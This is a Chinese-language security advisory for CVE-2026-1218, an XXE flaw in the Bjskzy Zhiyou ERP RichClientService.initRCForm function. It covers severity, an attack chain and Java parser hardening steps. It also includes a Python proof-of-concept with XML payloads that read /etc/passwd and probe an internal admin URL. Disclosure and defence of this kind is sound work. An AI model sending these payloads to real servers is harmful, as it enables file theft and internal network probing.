CVE-2026-1218 Bjskzy Zhiyou ERP XXE漏洞

漏洞信息

漏洞编号

CVE-2026-1218

漏洞类型

XXE（XML外部实体注入）

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Bjskzy Zhiyou ERP（时空智友ERP）

漏洞概述

CVE-2026-1218是发生在Bjskzy Zhiyou ERP（时空智友ERP）系统中的一处XML外部实体注入（XXE）漏洞。该漏洞存在于com.artery.richclient.RichClientService组件的RichClientService.class文件中，具体影响initRCForm函数。攻击者可以通过构造恶意的XML外部实体引用来读取服务器上的敏感文件，如配置文件、密码文件等，甚至可能触发拒绝服务攻击或进行内网探测。该漏洞CVSS评分为6.3，属于中危级别，攻击复杂度低，无需特殊权限即可利用，但需要认证为低权限用户。由于该漏洞的利用代码已公开，攻击者可以轻松获取相关工具进行攻击，建议受影响用户尽快采取防护措施。

技术细节

该漏洞是经典的XML外部实体注入（XXE）漏洞。在Bjskzy Zhiyou ERP系统中，RichClientService组件的initRCForm函数在处理XML输入时未对外部实体进行适当的安全限制。攻击者可以通过向该函数提交包含恶意XML外部实体引用的请求，诱使服务器解析器加载外部资源。典型利用方式包括：1）使用file://协议读取本地文件，如/etc/passwd、配置文件等；2）使用http://协议进行内网端口探测；3）利用expect://协议执行系统命令（如服务器支持）；4）使用ftp://或gopher://协议进行更复杂的攻击。攻击者通常通过SOAP或REST API接口发送恶意构造的XML payload，服务器在解析时会尝试访问外部实体，导致敏感信息泄露或服务端请求伪造（SSRF）。

攻击链分析

STEP 1

步骤1

攻击者识别目标Bjskzy Zhiyou ERP系统，定位RichClientService接口

STEP 2

步骤2

构造包含XML外部实体引用的恶意请求，payload使用file://或http://协议

STEP 3

步骤3

发送恶意XML请求到initRCForm函数端点

STEP 4

步骤4

服务器XML解析器处理请求，尝试加载外部实体

STEP 5

步骤5

敏感文件内容或内网资源响应被包含在服务器响应中返回

STEP 6

步骤6

攻击者获取敏感信息后，可进一步利用进行横向移动或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import xml.etree.ElementTree as ET

# CVE-2026-1218 XXE PoC for Bjskzy Zhiyou ERP
# Target: RichClientService.initRCForm endpoint

TARGET_URL = "http://target-server.com/RichClientService"

# XXE payload to read /etc/passwd
xxe_payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <initRCForm>
    &xxe;
  </initRCForm>
</root>'''

# Alternative payload for SSRF/internal port scanning
ssrf_payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://internal-server:8080/admin">
]>
<root>
  <initRCForm>
    &xxe;
  </initRCForm>
</root>'''

def exploit_xxe(url, payload):
    headers = {
        'Content-Type': 'application/xml',
        'User-Agent': 'Mozilla/5.0'
    }
    try:
        response = requests.post(url, data=payload, headers=headers, timeout=10)
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text}")
        return response.text
    except Exception as e:
        print(f"Error: {e}")
        return None

if __name__ == "__main__":
    print("CVE-2026-1218 XXE PoC")
    print("=" * 50)
    exploit_xxe(TARGET_URL, xxe_payload)

影响范围

Bjskzy Zhiyou ERP <= 11.0

防御指南

临时缓解措施

在XML解析代码中禁用外部实体解析功能。对于Java应用，可通过设置DocumentBuilderFactory和SAXParserFactory的安全特性来防止XXE攻击，具体措施包括：1）设置disallow-doctype-decl为true；2）禁用external-general-entities和external-parameter-entities；3）禁止XInclude支持；4）设置secure-processing为true。同时，建议在WAF上配置XML注入防护规则，对相关接口进行流量监控。